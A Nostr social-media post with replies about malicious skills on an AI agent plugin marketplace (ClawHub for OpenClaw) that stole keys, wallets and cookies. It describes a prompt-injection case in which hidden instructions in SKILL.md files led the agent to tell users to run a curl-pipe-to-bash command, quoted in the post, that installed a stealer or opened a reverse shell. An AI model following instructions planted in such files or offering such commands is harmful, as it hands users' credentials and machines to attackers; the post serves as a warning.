Damus
Open in Damus
captjack πŸ΄β€β˜ οΈβœ¨πŸ’œ profile picture
captjack πŸ΄β€β˜ οΈβœ¨πŸ’œ
@captjack
the #1 most downloaded skill on OpenClaw marketplace was MALWARE

it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server

1,184 malicious skills found, one attacker uploaded 677 packages ALONE

OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins

you install a skill, your AI agent gets new powers, this sounds great

the problem? ClawHub let ANYONE publish with just a 1 week old github account

attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL

but hidden in the SKILL .md
file were instructions that tricked the AI into telling you to run a command

> to enable this feature please run: curl -sL malware_link | bash

that one command installed Atomic Stealer on macOS

it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files

on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine.
194❀️5🍿1πŸ‘€1😱1πŸ€™1🀦1
mIX · 10w
It works then!
captjack πŸ΄β€β˜ οΈβœ¨πŸ’œ · 10w
nobody download nostr client of app shitclaw -> thousands in hours n days not even a month since moltbot fever started
Austin · 10w
I expected more news on this, but this is the first I’ve heard it mentioned
Alan · 10w
I'd rather it be that then a malicious library making its way to every device.
The Bitcoin Street Journal · 10w
mac, lolz
Kendy · 10w
To balance your fear-monger, there’s been multiple corrective actions and mitigations, starting February 6 and even earlier: β€œ - **Feb 19 (v2026.2.19)**: 40+ fixes incl. block unsafe deep-merge keys (prototype pollution); harden Windows command injection; node-scoped URLs (mitigate SSRF); strict...
G Force G · 10w
Not shocked at all.
Kayne · 10w
Kinda feel like the retards got what they deserve for the most part. Feel bad for ignorant people who were just curious and messing around but otherwise meh. Fuck around and find out as they say. Why anyone would give AI control over their computer and an internet connection at the same time is...
Alex Gleason · 10w
Do you have the link to it? I want to see it.
ETiT3 · 10w
the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where...
theGig · 10w
Couldn't you just prompt your bot to look over and check the skill before installing it?
Allen · 10w
What are these cryptoe wallets you speak off? Is my fart coin secure?